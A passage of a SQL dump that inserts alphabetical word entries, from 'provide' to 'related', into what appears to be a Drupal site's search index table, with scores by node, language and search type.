('provide', 135, 'en', 'node_search', 1),
('provide', 136, 'en', 'node_search', 1),
('provide', 185, 'en', 'node_search', 1),
('provided', 2, 'en', 'help_search', 1),
('provided', 2, 'ja', 'help_search', 1),
('provided', 2, 'ko', 'help_search', 1),
('provided', 6, 'en', 'help_search', 0.957226),
('provided', 6, 'ja', 'help_search', 0.957226),
('provided', 6, 'ko', 'help_search', 0.957226),
('provided', 7, 'en', 'help_search', 1),
('provided', 7, 'ja', 'help_search', 1),
('provided', 7, 'ko', 'help_search', 1),
('provided', 18, 'en', 'node_search', 1),
('provided', 18, 'ko', 'node_search', 1),
('provided', 20, 'en', 'help_search', 1),
('provided', 20, 'ja', 'help_search', 1),
('provided', 20, 'ko', 'help_search', 1),
('provided', 23, 'en', 'node_search', 1),
('provided', 24, 'en', 'node_search', 0.863659),
('provided', 28, 'en', 'help_search', 1),
('provided', 28, 'ja', 'help_search', 1),
('provided', 28, 'ko', 'help_search', 1),
('provided', 30, 'en', 'help_search', 1.73165),
('provided', 30, 'ja', 'help_search', 1.73165),
('provided', 30, 'ko', 'help_search', 1.73165),
('provided', 31, 'ja', 'help_search', 4.30399),
('provided', 36, 'en', 'help_search', 2),
('provided', 36, 'ja', 'help_search', 2),
('provided', 36, 'ko', 'help_search', 2),
('provided', 41, 'en', 'help_search', 5),
('provided', 41, 'ja', 'help_search', 5),
('provided', 41, 'ko', 'help_search', 5),
('provided', 43, 'en', 'help_search', 2),
('provided', 43, 'ja', 'help_search', 2),
('provided', 43, 'ko', 'help_search', 2),
('provided', 46, 'en', 'help_search', 25.989),
('provided', 46, 'ja', 'help_search', 25.989),
('provided', 46, 'ko', 'help_search', 25.989),
('provided', 67, 'en', 'help_search', 1),
('provided', 67, 'ja', 'help_search', 1),
('provided', 67, 'ko', 'help_search', 1),
('provided', 68, 'en', 'help_search', 1),
('provided', 68, 'ja', 'help_search', 1),
('provided', 68, 'ko', 'help_search', 1),
('provided', 81, 'en', 'help_search', 1),
('provided', 81, 'ja', 'help_search', 1),
('provided', 81, 'ko', 'help_search', 1),
('provided', 122, 'en', 'node_search', 1),
('provides', 1, 'en', 'help_search', 1),
('provides', 1, 'ja', 'help_search', 1),
('provides', 1, 'ko', 'help_search', 1),
('provides', 11, 'en', 'help_search', 2.90286),
('provides', 11, 'ja', 'help_search', 2.90286),
('provides', 11, 'ko', 'help_search', 2.90286),
('provides', 23, 'en', 'help_search', 3),
('provides', 23, 'ja', 'help_search', 3),
('provides', 23, 'ko', 'help_search', 3),
('provides', 29, 'en', 'help_search', 1),
('provides', 29, 'ja', 'help_search', 1),
('provides', 29, 'ko', 'help_search', 1),
('provides', 30, 'en', 'help_search', 1),
('provides', 30, 'ja', 'help_search', 1),
('provides', 30, 'ko', 'help_search', 1),
('provides', 35, 'en', 'help_search', 3.99731),
('provides', 35, 'ja', 'help_search', 3.99731),
('provides', 35, 'ko', 'help_search', 3.99731),
('provides', 36, 'en', 'help_search', 3),
('provides', 36, 'ja', 'help_search', 3),
('provides', 36, 'ko', 'help_search', 3),
('provides', 39, 'en', 'help_search', 1),
('provides', 39, 'ja', 'help_search', 1),
('provides', 39, 'ko', 'help_search', 1),
('provides', 40, 'en', 'help_search', 1),
('provides', 40, 'ja', 'help_search', 1),
('provides', 40, 'ko', 'help_search', 1),
('provides', 41, 'en', 'help_search', 2),
('provides', 41, 'ja', 'help_search', 2),
('provides', 41, 'ko', 'help_search', 2),
('provides', 43, 'en', 'help_search', 1),
('provides', 43, 'ja', 'help_search', 1),
('provides', 43, 'ko', 'help_search', 1),
('provides', 44, 'en', 'help_search', 2),
('provides', 44, 'ja', 'help_search', 2),
('provides', 44, 'ko', 'help_search', 2),
('provides', 65, 'en', 'help_search', 1),
('provides', 65, 'ja', 'help_search', 1),
('provides', 65, 'ko', 'help_search', 1),
('provides', 68, 'en', 'help_search', 1),
('provides', 68, 'ja', 'help_search', 1),
('provides', 68, 'ko', 'help_search', 1),
('provides', 72, 'en', 'help_search', 1),
('provides', 72, 'ja', 'help_search', 1),
('provides', 72, 'ko', 'help_search', 1),
('provides', 80, 'en', 'help_search', 0.934703),
('provides', 80, 'ja', 'help_search', 0.934703),
('provides', 80, 'ko', 'help_search', 0.934703),
('provides', 81, 'en', 'help_search', 1),
('provides', 81, 'ja', 'help_search', 1),
('provides', 81, 'ko', 'help_search', 1),
('provides', 198, 'en', 'node_search', 1),
('providing', 23, 'en', 'node_search', 1.77908),
('providing', 24, 'en', 'node_search', 3.72386),
('providing', 26, 'en', 'node_search', 1),
('providing', 30, 'en', 'help_search', 2),
('providing', 30, 'ja', 'help_search', 2),
('providing', 30, 'ko', 'help_search', 2),
('providing', 67, 'ja', 'node_search', 1),
('providing', 162, 'en', 'node_search', 1),
('public', 27, 'en', 'node_search', 0.833529),
('public', 38, 'en', 'help_search', 1),
('public', 38, 'ja', 'help_search', 1),
('public', 38, 'ko', 'help_search', 1),
('publish', 10, 'en', 'help_search', 5),
('publish', 10, 'ja', 'help_search', 5),
('publish', 10, 'ko', 'help_search', 5),
('publish', 59, 'en', 'help_search', 2),
('publish', 59, 'ja', 'help_search', 2),
('publish', 59, 'ko', 'help_search', 2),
('publish', 61, 'en', 'help_search', 4.97258),
('publish', 61, 'ja', 'help_search', 4.97258),
('publish', 61, 'ko', 'help_search', 4.97258),
('published', 11, 'en', 'help_search', 1),
('published', 11, 'ja', 'help_search', 1),
('published', 11, 'ko', 'help_search', 1),
('published', 59, 'en', 'help_search', 4),
('published', 59, 'ja', 'help_search', 4),
('published', 59, 'ko', 'help_search', 4),
('published', 61, 'en', 'help_search', 4),
('published', 61, 'ja', 'help_search', 4),
('published', 61, 'ko', 'help_search', 4),
('published', 68, 'en', 'help_search', 3.61143),
('published', 68, 'ja', 'help_search', 3.61143),
('published', 68, 'ko', 'help_search', 3.61143),
('published', 93, 'en', 'help_search', 1),
('published', 93, 'ja', 'help_search', 1),
('published', 93, 'ko', 'help_search', 1),
('publishes', 11, 'en', 'help_search', 0.989021),
('publishes', 11, 'ja', 'help_search', 0.989021),
('publishes', 11, 'ko', 'help_search', 0.989021),
('publishing', 93, 'en', 'help_search', 0.822065);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('publishing', 93, 'ja', 'help_search', 0.822065),
('publishing', 93, 'ko', 'help_search', 0.822065),
('pull', 93, 'en', 'help_search', 0.892724),
('pull', 93, 'ja', 'help_search', 0.892724),
('pull', 93, 'ko', 'help_search', 0.892724),
('purchase', 27, 'en', 'node_search', 0.641769),
('purpose', 135, 'en', 'node_search', 46),
('purpose', 135, 'ja', 'node_search', 27),
('purposes', 6, 'en', 'help_search', 0.993146),
('purposes', 6, 'ja', 'help_search', 0.993146),
('purposes', 6, 'ko', 'help_search', 0.993146),
('purposes', 11, 'en', 'help_search', 1),
('purposes', 11, 'ja', 'help_search', 1),
('purposes', 11, 'ko', 'help_search', 1),
('purposes', 30, 'en', 'help_search', 0.961087),
('purposes', 30, 'ja', 'help_search', 0.961087),
('purposes', 30, 'ko', 'help_search', 0.961087),
('purposes', 31, 'ja', 'help_search', 1),
('pursue', 161, 'en', 'node_search', 1),
('pursue', 167, 'en', 'node_search', 1),
('pursue', 168, 'en', 'node_search', 1),
('pursue', 176, 'en', 'node_search', 1),
('pursue', 180, 'en', 'node_search', 1),
('pursue', 191, 'en', 'node_search', 1),
('pursue', 192, 'en', 'node_search', 1),
('pursues', 175, 'en', 'node_search', 1),
('pursuing', 154, 'en', 'node_search', 1),
('pursuing', 165, 'en', 'node_search', 1),
('pursuing', 170, 'en', 'node_search', 1),
('pursuing', 181, 'en', 'node_search', 1),
('pursuing', 183, 'en', 'node_search', 1),
('pursuing', 186, 'en', 'node_search', 1),
('pursuing', 189, 'en', 'node_search', 1),
('pursuing', 198, 'en', 'node_search', 1),
('put', 34, 'en', 'help_search', 1),
('put', 34, 'ja', 'help_search', 1),
('put', 34, 'ko', 'help_search', 1),
('put', 42, 'en', 'help_search', 1),
('put', 42, 'ja', 'help_search', 1),
('put', 42, 'ko', 'help_search', 1),
('put', 55, 'en', 'help_search', 1),
('put', 55, 'ja', 'help_search', 1),
('put', 55, 'ko', 'help_search', 1),
('put', 73, 'en', 'help_search', 9),
('put', 73, 'ja', 'help_search', 9),
('put', 73, 'ko', 'help_search', 9),
('putting', 46, 'en', 'help_search', 1),
('putting', 46, 'ja', 'help_search', 1),
('putting', 46, 'ko', 'help_search', 1),
('pwint', 167, 'en', 'node_search', 1),
('pwint', 167, 'ja', 'node_search', 1),
('pwint', 183, 'en', 'node_search', 5),
('pwint', 183, 'ja', 'node_search', 3.99983),
('pyae', 73, 'en', 'node_search', 1),
('pyae', 73, 'ja', 'node_search', 1),
('pyae', 86, 'en', 'node_search', 2),
('pyae', 86, 'ja', 'node_search', 2),
('pyae', 89, 'en', 'node_search', 2),
('pyae', 89, 'ja', 'node_search', 2),
('pyae', 97, 'en', 'node_search', 2),
('pyae', 97, 'ja', 'node_search', 2),
('pyae', 107, 'en', 'node_search', 28),
('pyae', 107, 'ja', 'node_search', 31),
('pyae', 108, 'en', 'node_search', 2),
('pyae', 108, 'ja', 'node_search', 2),
('pyae', 111, 'en', 'node_search', 2),
('pyae', 111, 'ja', 'node_search', 2),
('pyae', 113, 'en', 'node_search', 2),
('pyae', 113, 'ja', 'node_search', 2),
('pyae', 115, 'en', 'node_search', 28),
('pyae', 115, 'ja', 'node_search', 28),
('pyae', 128, 'en', 'node_search', 31),
('pyae', 128, 'ja', 'node_search', 31),
('pyae', 134, 'en', 'node_search', 1),
('pyae', 134, 'ja', 'node_search', 1),
('pyae', 151, 'en', 'node_search', 1),
('pyae', 151, 'ja', 'node_search', 1),
('pyae', 157, 'en', 'node_search', 2),
('pyae', 157, 'ja', 'node_search', 2),
('pyae', 173, 'en', 'node_search', 1),
('pyae', 173, 'ja', 'node_search', 1),
('pyae', 176, 'en', 'node_search', 2),
('pyae', 176, 'ja', 'node_search', 2),
('pyae', 180, 'en', 'node_search', 3),
('pyae', 180, 'ja', 'node_search', 1.80007),
('pyi', 23, 'en', 'node_search', 1),
('pyi', 27, 'en', 'node_search', 6.43048),
('qualification', 10, 'en', 'node_search', 4),
('qualification', 10, 'ko', 'node_search', 4),
('qualification', 23, 'en', 'node_search', 0.810915),
('qualifications', 4, 'en', 'node_search', 1),
('qualifications', 4, 'ja', 'node_search', 1),
('qualified', 23, 'en', 'node_search', 0.976851),
('qualified', 160, 'en', 'node_search', 1),
('qualified', 162, 'en', 'node_search', 1),
('qualified', 179, 'en', 'node_search', 1),
('qualities', 189, 'en', 'node_search', 1),
('quality', 25, 'en', 'node_search', 1),
('quality', 188, 'en', 'node_search', 1),
('queries', 6, 'en', 'help_search', 31.2416),
('queries', 6, 'ja', 'help_search', 31.2416),
('queries', 6, 'ko', 'help_search', 31.2416),
('queries', 67, 'en', 'help_search', 1),
('queries', 67, 'ja', 'help_search', 1),
('queries', 67, 'ko', 'help_search', 1),
('query', 6, 'en', 'help_search', 1),
('query', 6, 'ja', 'help_search', 1),
('query', 6, 'ko', 'help_search', 1),
('question', 29, 'en', 'node_search', 3),
('question', 62, 'en', 'node_search', 1.74685),
('questions', 1, 'en', 'node_search', 1),
('questions', 62, 'ja', 'node_search', 0.565115),
('quick', 22, 'en', 'help_search', 1),
('quick', 22, 'ja', 'help_search', 1),
('quick', 22, 'ko', 'help_search', 1),
('quick', 39, 'en', 'help_search', 49),
('quick', 39, 'ja', 'help_search', 49),
('quick', 39, 'ko', 'help_search', 49),
('quick', 43, 'en', 'help_search', 5),
('quick', 43, 'ja', 'help_search', 5),
('quick', 43, 'ko', 'help_search', 5),
('quick', 69, 'en', 'help_search', 1),
('quick', 69, 'ja', 'help_search', 1),
('quick', 69, 'ko', 'help_search', 1),
('quickly', 6, 'en', 'node_search', 3),
('quickly', 28, 'en', 'node_search', 4),
('quickly', 37, 'en', 'help_search', 1.89945),
('quickly', 37, 'ja', 'help_search', 1.89945),
('quickly', 37, 'ko', 'help_search', 1.89945),
('quickly', 39, 'en', 'help_search', 1),
('quickly', 39, 'ja', 'help_search', 1),
('quickly', 39, 'ko', 'help_search', 1),
('quitting', 3, 'en', 'node_search', 1),
('quitting', 3, 'ko', 'node_search', 1),
('race', 24, 'en', 'node_search', 1),
('ran', 31, 'ja', 'help_search', 1),
('range', 31, 'ja', 'help_search', 1.70574),
('ranging', 32, 'en', 'help_search', 1),
('ranging', 32, 'ja', 'help_search', 1),
('ranging', 32, 'ko', 'help_search', 1),
('ranging', 133, 'en', 'node_search', 1),
('ranking', 66, 'en', 'help_search', 5),
('ranking', 66, 'ja', 'help_search', 5),
('rather', 73, 'en', 'help_search', 1),
('rather', 73, 'ja', 'help_search', 1),
('rather', 73, 'ko', 'help_search', 1),
('ratio', 6, 'en', 'help_search', 1),
('ratio', 6, 'ja', 'help_search', 1),
('ratio', 6, 'ko', 'help_search', 1),
('ray', 31, 'en', 'node_search', 1),
('rcc', 27, 'en', 'node_search', 0.695602),
('rcc', 27, 'ja', 'node_search', 0.353474),
('reach', 1, 'en', 'node_search', 1),
('reach', 23, 'en', 'help_search', 0.989021),
('reach', 23, 'ja', 'help_search', 0.989021),
('reach', 23, 'ko', 'help_search', 0.989021),
('reached', 192, 'en', 'node_search', 1),
('reaching', 184, 'en', 'node_search', 1),
('read', 25, 'ja', 'help_search', 1),
('read', 30, 'en', 'help_search', 0.71),
('read', 30, 'ja', 'help_search', 0.71),
('read', 30, 'ko', 'help_search', 0.71),
('readers', 25, 'ja', 'help_search', 1),
('readers', 42, 'en', 'help_search', 1),
('readers', 42, 'ja', 'help_search', 1),
('readers', 42, 'ko', 'help_search', 1),
('readiness', 180, 'en', 'node_search', 1),
('readiness', 186, 'en', 'node_search', 28),
('readiness', 199, 'en', 'node_search', 1),
('reading', 62, 'en', 'node_search', 1),
('ready', 57, 'en', 'help_search', 1),
('ready', 57, 'ja', 'help_search', 1),
('ready', 57, 'ko', 'help_search', 1),
('ready', 87, 'en', 'node_search', 1),
('really', 6, 'en', 'help_search', 1),
('really', 6, 'ja', 'help_search', 1),
('really', 6, 'ko', 'help_search', 1),
('rearrange', 17, 'en', 'help_search', 1),
('rearrange', 17, 'ja', 'help_search', 1),
('rearrange', 17, 'ko', 'help_search', 1),
('rearrange', 91, 'en', 'help_search', 4),
('rearrange', 91, 'ja', 'help_search', 4),
('rearrange', 91, 'ko', 'help_search', 4),
('reasons', 75, 'en', 'help_search', 2),
('reasons', 75, 'ja', 'help_search', 2),
('reasons', 75, 'ko', 'help_search', 2),
('rebuild', 45, 'en', 'help_search', 4),
('rebuild', 45, 'ja', 'help_search', 4),
('rebuild', 45, 'ko', 'help_search', 4),
('recalculated', 37, 'en', 'help_search', 1),
('recalculated', 37, 'ja', 'help_search', 1),
('recalculated', 37, 'ko', 'help_search', 1),
('recalculation', 37, 'en', 'help_search', 1),
('recalculation', 37, 'ja', 'help_search', 1),
('recalculation', 37, 'ko', 'help_search', 1),
('receive', 3, 'en', 'node_search', 1),
('receive', 3, 'ko', 'node_search', 1),
('receive', 79, 'en', 'help_search', 1),
('receive', 79, 'ja', 'help_search', 1),
('receive', 79, 'ko', 'help_search', 1),
('receive', 82, 'en', 'help_search', 1),
('receive', 82, 'ja', 'help_search', 1),
('receive', 82, 'ko', 'help_search', 1),
('receive', 138, 'en', 'node_search', 1),
('recent', 76, 'en', 'help_search', 4),
('recent', 76, 'ja', 'help_search', 4),
('recent', 76, 'ko', 'help_search', 4),
('recent', 93, 'en', 'help_search', 1),
('recent', 93, 'ja', 'help_search', 1),
('recent', 93, 'ko', 'help_search', 1),
('recently', 40, 'en', 'help_search', 1),
('recently', 40, 'ja', 'help_search', 1),
('recently', 40, 'ko', 'help_search', 1),
('recently', 47, 'en', 'help_search', 1),
('recently', 47, 'ja', 'help_search', 1),
('recently', 47, 'ko', 'help_search', 1),
('recently', 50, 'en', 'help_search', 1),
('recently', 50, 'ja', 'help_search', 1),
('recently', 50, 'ko', 'help_search', 1),
('recipe', 80, 'en', 'help_search', 3),
('recipe', 80, 'ja', 'help_search', 3),
('recipe', 80, 'ko', 'help_search', 3),
('recipes', 11, 'en', 'help_search', 1),
('recipes', 11, 'ja', 'help_search', 1),
('recipes', 11, 'ko', 'help_search', 1),
('recipes', 62, 'en', 'help_search', 1),
('recipes', 62, 'ja', 'help_search', 1),
('recipes', 62, 'ko', 'help_search', 1),
('recipes', 80, 'en', 'help_search', 1),
('recipes', 80, 'ja', 'help_search', 1),
('recipes', 80, 'ko', 'help_search', 1),
('recipient', 20, 'en', 'help_search', 1),
('recipient', 20, 'ja', 'help_search', 1),
('recipient', 20, 'ko', 'help_search', 1),
('recipients', 19, 'en', 'help_search', 4),
('recipients', 19, 'ja', 'help_search', 4),
('recipients', 19, 'ko', 'help_search', 4),
('recipients', 20, 'en', 'help_search', 1),
('recipients', 20, 'ja', 'help_search', 1),
('recipients', 20, 'ko', 'help_search', 1),
('recognized', 191, 'en', 'node_search', 27),
('recommended', 32, 'en', 'help_search', 1),
('recommended', 32, 'ja', 'help_search', 1),
('recommended', 32, 'ko', 'help_search', 1),
('recommended', 33, 'en', 'help_search', 1),
('recommended', 33, 'ja', 'help_search', 1),
('recommended', 33, 'ko', 'help_search', 1),
('recommended', 35, 'en', 'help_search', 1),
('recommended', 35, 'ja', 'help_search', 1),
('recommended', 35, 'ko', 'help_search', 1),
('recommended', 155, 'en', 'node_search', 1),
('record', 30, 'en', 'node_search', 2),
('records', 47, 'en', 'help_search', 1),
('records', 47, 'ja', 'help_search', 1),
('records', 47, 'ko', 'help_search', 1),
('recruitment', 24, 'en', 'node_search', 1.68488),
('recruitment', 24, 'ja', 'node_search', 0.961223),
('recruitment', 24, 'ko', 'node_search', 0.854391),
('recruitment', 26, 'en', 'node_search', 1),
('recruitment', 26, 'ja', 'node_search', 1),
('recruitment', 161, 'en', 'node_search', 1),
('recruitment', 179, 'en', 'node_search', 1),
('recruitment', 193, 'en', 'node_search', 1),
('recruitment', 195, 'en', 'node_search', 1),
('red', 80, 'en', 'help_search', 1),
('red', 80, 'ja', 'help_search', 1),
('red', 80, 'ko', 'help_search', 1),
('redirected', 14, 'en', 'help_search', 1),
('redirected', 14, 'ja', 'help_search', 1),
('redirected', 14, 'ko', 'help_search', 1),
('reduce', 61, 'en', 'help_search', 1),
('reduce', 61, 'ja', 'help_search', 1),
('reduce', 61, 'ko', 'help_search', 1),
('reduce', 67, 'en', 'help_search', 1),
('reduce', 67, 'ja', 'help_search', 1),
('reduce', 67, 'ko', 'help_search', 1),
('reduce', 87, 'en', 'node_search', 1),
('reference', 11, 'en', 'help_search', 0.886095),
('reference', 11, 'ja', 'help_search', 0.886095),
('reference', 11, 'ko', 'help_search', 0.886095),
('reference', 27, 'en', 'help_search', 45),
('reference', 27, 'ja', 'help_search', 45),
('reference', 27, 'ko', 'help_search', 45),
('reference', 31, 'ja', 'help_search', 32.2871),
('reference', 35, 'en', 'help_search', 5),
('reference', 35, 'ja', 'help_search', 5),
('reference', 35, 'ko', 'help_search', 5),
('reference', 54, 'en', 'help_search', 2),
('reference', 54, 'ja', 'help_search', 2),
('reference', 54, 'ko', 'help_search', 2),
('reference', 71, 'en', 'help_search', 11),
('reference', 71, 'ja', 'help_search', 11),
('reference', 71, 'ko', 'help_search', 11),
('reference', 79, 'en', 'help_search', 7),
('reference', 79, 'ja', 'help_search', 7),
('reference', 79, 'ko', 'help_search', 7),
('reference', 80, 'en', 'help_search', 3.92027),
('reference', 80, 'ja', 'help_search', 3.92027),
('reference', 80, 'ko', 'help_search', 3.92027),
('referenced', 27, 'en', 'help_search', 1),
('referenced', 27, 'ja', 'help_search', 1),
('referenced', 27, 'ko', 'help_search', 1),
('referenced', 35, 'en', 'help_search', 1),
('referenced', 35, 'ja', 'help_search', 1),
('referenced', 35, 'ko', 'help_search', 1),
('referenced', 54, 'en', 'help_search', 1),
('referenced', 54, 'ja', 'help_search', 1),
('referenced', 54, 'ko', 'help_search', 1),
('refers', 37, 'en', 'help_search', 1),
('refers', 37, 'ja', 'help_search', 1),
('refers', 37, 'ko', 'help_search', 1),
('refine', 25, 'ja', 'help_search', 1),
('refine', 26, 'en', 'help_search', 1),
('refine', 26, 'ja', 'help_search', 1),
('refine', 26, 'ko', 'help_search', 1),
('refine', 62, 'en', 'node_search', 1),
('refine', 116, 'en', 'node_search', 1),
('reflects', 161, 'en', 'node_search', 1),
('reflects', 166, 'en', 'node_search', 1),
('reflects', 170, 'en', 'node_search', 1),
('reflects', 179, 'en', 'node_search', 1),
('reflects', 180, 'en', 'node_search', 1),
('reflects', 184, 'en', 'node_search', 1),
('reflects', 186, 'en', 'node_search', 1),
('reflects', 189, 'en', 'node_search', 1),
('reflects', 191, 'en', 'node_search', 1),
('reflects', 193, 'en', 'node_search', 1),
('reflects', 195, 'en', 'node_search', 1),
('reflects', 198, 'en', 'node_search', 1),
('reflects', 199, 'en', 'node_search', 1),
('regardless', 24, 'en', 'node_search', 1),
('region', 1, 'en', 'help_search', 9),
('region', 1, 'ja', 'help_search', 9),
('region', 1, 'ko', 'help_search', 9),
('region', 2, 'en', 'help_search', 2),
('region', 2, 'ja', 'help_search', 2),
('region', 2, 'ko', 'help_search', 2),
('region', 3, 'en', 'help_search', 3),
('region', 3, 'ja', 'help_search', 3),
('region', 3, 'ko', 'help_search', 3),
('region', 16, 'en', 'help_search', 4),
('region', 16, 'ja', 'help_search', 4),
('region', 16, 'ko', 'help_search', 4),
('region', 27, 'en', 'node_search', 1.96109),
('region', 36, 'en', 'help_search', 1),
('region', 36, 'ja', 'help_search', 1),
('region', 36, 'ko', 'help_search', 1),
('region', 45, 'en', 'help_search', 2),
('region', 45, 'ja', 'help_search', 2),
('region', 45, 'ko', 'help_search', 2),
('region', 49, 'en', 'help_search', 4),
('region', 49, 'ja', 'help_search', 4),
('region', 49, 'ko', 'help_search', 4),
('region', 50, 'en', 'help_search', 4),
('region', 50, 'ja', 'help_search', 4),
('region', 50, 'ko', 'help_search', 4),
('region', 51, 'en', 'help_search', 4),
('region', 51, 'ja', 'help_search', 4),
('region', 51, 'ko', 'help_search', 4),
('region', 52, 'en', 'help_search', 4),
('region', 52, 'ja', 'help_search', 4),
('region', 52, 'ko', 'help_search', 4),
('region', 53, 'en', 'help_search', 4),
('region', 53, 'ja', 'help_search', 4),
('region', 53, 'ko', 'help_search', 4),
('region', 71, 'en', 'help_search', 8),
('region', 71, 'ja', 'help_search', 8),
('region', 71, 'ko', 'help_search', 8),
('region', 92, 'en', 'help_search', 4),
('region', 92, 'ja', 'help_search', 4),
('region', 92, 'ko', 'help_search', 4),
('regional', 71, 'en', 'help_search', 4),
('regional', 71, 'ja', 'help_search', 4),
('regional', 71, 'ko', 'help_search', 4),
('regions', 1, 'en', 'help_search', 5),
('regions', 1, 'ja', 'help_search', 5),
('regions', 1, 'ko', 'help_search', 5),
('regions', 2, 'en', 'help_search', 1),
('regions', 2, 'ja', 'help_search', 1),
('regions', 2, 'ko', 'help_search', 1),
('regions', 3, 'en', 'help_search', 5),
('regions', 3, 'ja', 'help_search', 5),
('regions', 3, 'ko', 'help_search', 5),
('regions', 24, 'en', 'node_search', 1),
('regions', 27, 'en', 'node_search', 0.957226),
('register', 19, 'en', 'node_search', 28),
('register', 19, 'ko', 'node_search', 28),
('register', 28, 'en', 'node_search', 3),
('register', 29, 'en', 'help_search', 1),
('register', 29, 'ja', 'help_search', 1),
('register', 29, 'ko', 'help_search', 1),
('register', 84, 'en', 'help_search', 1),
('register', 84, 'ja', 'help_search', 1),
('register', 84, 'ko', 'help_search', 1),
('register', 86, 'en', 'help_search', 2),
('register', 86, 'ja', 'help_search', 2),
('register', 86, 'ko', 'help_search', 2),
('registered', 18, 'en', 'help_search', 1),
('registered', 18, 'ja', 'help_search', 1),
('registered', 18, 'ko', 'help_search', 1),
('registered', 20, 'en', 'help_search', 1),
('registered', 20, 'ja', 'help_search', 1),
('registered', 20, 'ko', 'help_search', 1),
('registered', 93, 'en', 'help_search', 1),
('registered', 93, 'ja', 'help_search', 1),
('registered', 93, 'ko', 'help_search', 1),
('registration', 23, 'en', 'node_search', 1),
('registration', 27, 'en', 'node_search', 1.6334),
('regular', 80, 'en', 'help_search', 1.99731),
('regular', 80, 'ja', 'help_search', 1.99731),
('regular', 80, 'ko', 'help_search', 1.99731),
('regular', 93, 'en', 'help_search', 0.920273),
('regular', 93, 'ja', 'help_search', 0.920273),
('regular', 93, 'ko', 'help_search', 0.920273),
('regular', 142, 'en', 'node_search', 1),
('regulated', 3, 'en', 'node_search', 0.980874),
('regulated', 3, 'ko', 'node_search', 0.972861),
('reindex', 67, 'en', 'help_search', 3.78332),
('reindex', 67, 'ja', 'help_search', 3.78332),
('reindex', 67, 'ko', 'help_search', 3.78332),
('reindexed', 45, 'en', 'help_search', 1),
('reindexed', 45, 'ja', 'help_search', 1),
('reindexed', 45, 'ko', 'help_search', 1),
('reinforce', 142, 'en', 'node_search', 1),
('related', 2, 'en', 'help_search', 1),
('related', 2, 'ja', 'help_search', 1),
('related', 2, 'ko', 'help_search', 1),
('related', 3, 'en', 'node_search', 1),
('related', 3, 'ko', 'node_search', 1),
('related', 7, 'en', 'help_search', 1),
('related', 7, 'ja', 'help_search', 1),
('related', 7, 'ko', 'help_search', 1),
('related', 8, 'en', 'help_search', 1),
('related', 8, 'ja', 'help_search', 1),
('related', 8, 'ko', 'help_search', 1),
('related', 10, 'en', 'node_search', 4),
('related', 10, 'ko', 'node_search', 4),
('related', 11, 'en', 'help_search', 0.866793),
('related', 11, 'ja', 'help_search', 0.866793),
('related', 11, 'ko', 'help_search', 0.866793),
('related', 20, 'en', 'help_search', 1),
('related', 20, 'ja', 'help_search', 1),
('related', 20, 'ko', 'help_search', 1),
('related', 22, 'en', 'help_search', 2),
('related', 22, 'ja', 'help_search', 2),
('related', 22, 'ko', 'help_search', 2),
('related', 24, 'en', 'node_search', 2.9689),
('related', 27, 'en', 'node_search', 0.902857),
('related', 28, 'en', 'help_search', 0.854391),
('related', 28, 'ja', 'help_search', 0.854391),
('related', 28, 'ko', 'help_search', 0.854391),
('related', 29, 'en', 'help_search', 0.961087),
('related', 29, 'ja', 'help_search', 0.961087),
('related', 29, 'ko', 'help_search', 0.961087),
('related', 30, 'en', 'help_search', 1.50606),
('related', 30, 'ja', 'help_search', 1.50606),
('related', 30, 'ko', 'help_search', 1.50606),
('related', 31, 'ja', 'help_search', 2.87785),
('related', 33, 'en', 'help_search', 2),
('related', 33, 'ja', 'help_search', 2),
('related', 33, 'ko', 'help_search', 2),
('related', 34, 'en', 'help_search', 2),
('related', 34, 'ja', 'help_search', 2),
('related', 34, 'ko', 'help_search', 2),
('related', 35, 'en', 'help_search', 0.980874),
('related', 35, 'ja', 'help_search', 0.980874),
('related', 35, 'ko', 'help_search', 0.980874),
('related', 36, 'en', 'help_search', 1),
('related', 36, 'ja', 'help_search', 1),
('related', 36, 'ko', 'help_search', 1),
('related', 38, 'en', 'help_search', 1),
('related', 38, 'ja', 'help_search', 1),
('related', 38, 'ko', 'help_search', 1),
('related', 40, 'en', 'help_search', 1),
('related', 40, 'ja', 'help_search', 1),
('related', 40, 'ko', 'help_search', 1),
('related', 41, 'en', 'help_search', 1),
('related', 41, 'ja', 'help_search', 1),
('related', 41, 'ko', 'help_search', 1),
('related', 42, 'en', 'help_search', 1),
('related', 42, 'ja', 'help_search', 1),
('related', 42, 'ko', 'help_search', 1),
('related', 43, 'en', 'help_search', 1.86679),
('related', 43, 'ja', 'help_search', 1.86679),
('related', 43, 'ko', 'help_search', 1.86679),
('related', 45, 'en', 'help_search', 1),
('related', 45, 'ja', 'help_search', 1),
('related', 45, 'ko', 'help_search', 1),
('related', 46, 'en', 'help_search', 2.9534),
('related', 46, 'ja', 'help_search', 2.9534),
('related', 46, 'ko', 'help_search', 2.9534),
('related', 48, 'en', 'help_search', 1),
('related', 48, 'ja', 'help_search', 1),
('related', 48, 'ko', 'help_search', 1),
('related', 54, 'en', 'help_search', 2),
('related', 54, 'ja', 'help_search', 2),
('related', 54, 'ko', 'help_search', 2),
('related', 57, 'en', 'help_search', 1),
('related', 57, 'ja', 'help_search', 1),
('related', 57, 'ko', 'help_search', 1),
('related', 60, 'en', 'help_search', 1),
('related', 60, 'ja', 'help_search', 1),
('related', 60, 'ko', 'help_search', 1),
('related', 62, 'en', 'help_search', 1),
('related', 62, 'ja', 'help_search', 1),
('related', 62, 'ko', 'help_search', 1),
('related', 63, 'en', 'help_search', 1),
('related', 63, 'ja', 'help_search', 1),
('related', 63, 'ko', 'help_search', 1),
('related', 65, 'en', 'help_search', 1),
('related', 65, 'ja', 'help_search', 1),
('related', 65, 'ko', 'help_search', 1),
('related', 68, 'en', 'help_search', 0.797402),
('related', 68, 'ja', 'help_search', 0.797402),
('related', 68, 'ko', 'help_search', 0.797402),
('related', 79, 'en', 'help_search', 2),
('related', 79, 'ja', 'help_search', 2),
('related', 79, 'ko', 'help_search', 2),
('related', 80, 'en', 'help_search', 0.913226),
('related', 80, 'ja', 'help_search', 0.913226),
('related', 80, 'ko', 'help_search', 0.913226),
('related', 84, 'en', 'help_search', 2),
('related', 84, 'ja', 'help_search', 2),
('related', 84, 'ko', 'help_search', 2),
('related', 86, 'en', 'help_search', 20.9849),
('related', 86, 'ja', 'help_search', 20.9849),
('related', 86, 'ko', 'help_search', 20.9849),
('related', 89, 'en', 'help_search', 1),
('related', 89, 'ja', 'help_search', 1),
('related', 89, 'ko', 'help_search', 1),
('related', 90, 'en', 'help_search', 1),
('related', 90, 'ja', 'help_search', 1),
('related', 90, 'ko', 'help_search', 1),
('related', 93, 'en', 'help_search', 2.4897),
